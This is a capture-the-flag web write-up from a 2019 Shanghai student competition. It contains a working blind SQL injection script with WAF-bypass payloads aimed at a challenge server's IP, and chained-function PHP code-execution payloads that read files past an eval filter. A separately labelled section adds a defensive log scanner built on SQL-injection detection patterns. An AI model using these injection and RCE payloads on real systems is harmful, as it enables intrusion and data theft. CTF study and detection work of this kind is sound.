2019 Shanghai College Student Cybersecurity Competition: web write-up

Preface

The web challenges were fairly easy; this is a record of the solutions.

easySql

Points tested: injection without column names, abuse of innodb_table_stats, WAF bypass

import requests
import string

url = "http://47.105.183.208:29898/article.php"
str1 = string.printable  # candidate characters, tried one by one per position
result = ''
# 0'+||+ascii(substring(user()+from+2))=112+||+'0

for i in range(1,100):
    for j in str1:
        # Earlier attempts, kept for reference: enumerate table/database names via
        # mysql.innodb_table_stats, then read the flag table without knowing its column names.
        #id = "0' || ascii(substring((select group_concat(table_name) from mysql.innodb_table_stats) from %d))=%d || '0"%(i,ord(j))
        #id = "0' || ascii(substring((select group_concat(database_name) from mysql.innodb_table_stats) from %d))=%d || '0"%(i,j)
        #id = "0' || ascii(substring((select group_concat(*) from fl111aa44a99g) from %d))=%d || '0"%(i,ord(j))
        #id = "0' || ascii(substring((select group_concat(database_name) from mysql.innodb_table_stats) from %d))=%d || '0"%(i,ord(j))
        #id = "0' || ascii(substring((select group_concat(e.2) from (select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e join (select 6)f union select * from fl111aa44a99g)e) from %d))=%d || '0"%(i,ord(j))
        #id = "0' || ascii(substring((select group_concat(e.2) from (select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e union select * from fl111aa44a99g)e) from %d))=%d || '0"%(i,ord(j))
        # Final payload: the third column (e.3) is addressed by position via join/union,
        # and /**/ replaces the space between union and select to get past the WAF.
        id = f"0' || ascii(substring((select group_concat(e.3) from (select * from (select 1)a join (select 2)b join (select 3)c union/**/select  * from cccttffff.fl111aa44a99g)e) from {i}))={ord(j)} || '0"
        #id = f"0' || ascii(substring((Version()) from {i}))={ord(j)} || '0"

        param = {
            'id':id
        }
        rep = requests.get(url,params=param)
        #print(rep.text)
        print(param)
        if '23333333' in rep.text:  # '23333333' appears in the response only when the condition is true
            result+=j
            print(result)
            break
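A defender-side counterpart, added here and not part of the original write-up: a small Python detector that scans web-server access logs for the payload shapes the script above sends (boolean-blind ascii/substring probes, column-less join/union extraction, innodb_table_stats enumeration, and /**/ splitting of keywords) and flags clients that send several of them. The Common Log Format layout, the threshold and the sample lines are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Common Log Format line: client IP, timestamp, request line, status (assumed layout).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Signatures for the techniques in this write-up, matched against the decoded,
# lower-cased value of each query parameter.
SIGNATURES = {
    "boolean_blind_char_probe": re.compile(r"ascii\s*\(\s*substring\s*\(.*?\)\s*=\s*\d+"),
    "column_less_extraction": re.compile(r"\(\s*select\s+\d+\s*\)\s*[a-z]\s+join\s*\(\s*select\s+\d+\s*\)"),
    "innodb_table_stats_enum": re.compile(r"innodb_table_stats"),
    "comment_keyword_splitting": re.compile(r"(union|select|from)/\*.*?\*/(union|select|from)"),
}

def classify_request(target):
    """Return the set of signature names that match any query parameter of a request target."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)  # percent- and +-decoded
    hits = set()
    for values in params.values():
        for value in values:
            value = value.lower()
            hits.update(name for name, pat in SIGNATURES.items() if pat.search(value))
    return hits

def scan_log(log_text, threshold=3):
    """Count suspicious requests per client and flag clients at or above the threshold."""
    per_client, per_signature = Counter(), Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m.group("target"))
        if hits:
            per_client[m.group("ip")] += 1
            per_signature.update(hits)
    flagged = sorted(ip for ip, n in per_client.items() if n >= threshold)
    return {"per_client": dict(per_client), "per_signature": dict(per_signature), "flagged": flagged}

# Constructed sample log (not captured from the challenge server): three probes from one client
# in the shape the script above sends, then one benign request from another client.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Nov/2019:10:00:01 +0800] "GET /article.php?id=0%27+%7C%7C+ascii%28substring%28%28select+group_concat%28e.3%29+from+%28select+%2A+from+%28select+1%29a+join+%28select+2%29b+join+%28select+3%29c+union%2F%2A%2A%2Fselect++%2A+from+cccttffff.fl111aa44a99g%29e%29+from+1%29%29%3D102+%7C%7C+%270 HTTP/1.1" 200 812
203.0.113.5 - - [09/Nov/2019:10:00:01 +0800] "GET /article.php?id=0%27+%7C%7C+ascii%28substring%28%28select+group_concat%28table_name%29+from+mysql.innodb_table_stats%29+from+1%29%29%3D102+%7C%7C+%270 HTTP/1.1" 200 812
203.0.113.5 - - [09/Nov/2019:10:00:02 +0800] "GET /article.php?id=0%27+%7C%7C+ascii%28substring%28%28Version%28%29%29+from+2%29%29%3D46+%7C%7C+%270 HTTP/1.1" 200 812
198.51.100.7 - - [09/Nov/2019:10:00:03 +0800] "GET /article.php?id=42 HTTP/1.1" 200 1337
"""

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```

Because the per-position loop above issues up to one request per printable character, the per-client count climbs into the hundreds within seconds, so a low threshold combined with a short time window is enough to catch it.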

babyt5

Points tested: SSRF, writing a shell via gopher

Original challenge: https://www.jianshu.com/p/804d95f6d6fb


decade

Points tested: RCE without parameters

Environment: PHP 5, Debian

<?php
highlight_file(__FILE__);
$code = $_GET['code'];
if (!empty($code)) {
    if (';' === preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)) {
        if (preg_match('/readfile|if|time|local|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i', $code)) {
            echo 'bye~';
        } else {
            var_dump($code);
            eval($code);
        }
    } else {
        echo "No way!!!";
    }
} else {
    echo "No way!!!";
}

First, the characters needed to change directory, such as "/" and ".", have to be constructed.


file() is used as a substitute for readfile(), which is blocked by the filter.

Payload:

die(next(file(end(scandir(chr(ord(strrev(crypt(serialize(array(chdir(next(scandir(next(scandir(chr(ord(strrev(crypt(serialize(array())))))))))))))))))))));

Payload:

echo(implode(file(end(scandir(chr(ceil(sinh(cosh(tan(ceil(sinh(sinh(cosh(ord(phpversion(chdir(next(scandir(next(scandir(chr(ceil(sinh(cosh(tan(floor(abs(tan(cosh(floor(phpversion())))))))))))))))))))))))))))))));

lol2

Unsolved


Unless otherwise stated, all articles on this blog are licensed under CC BY-SA 4.0; please credit the source when reposting!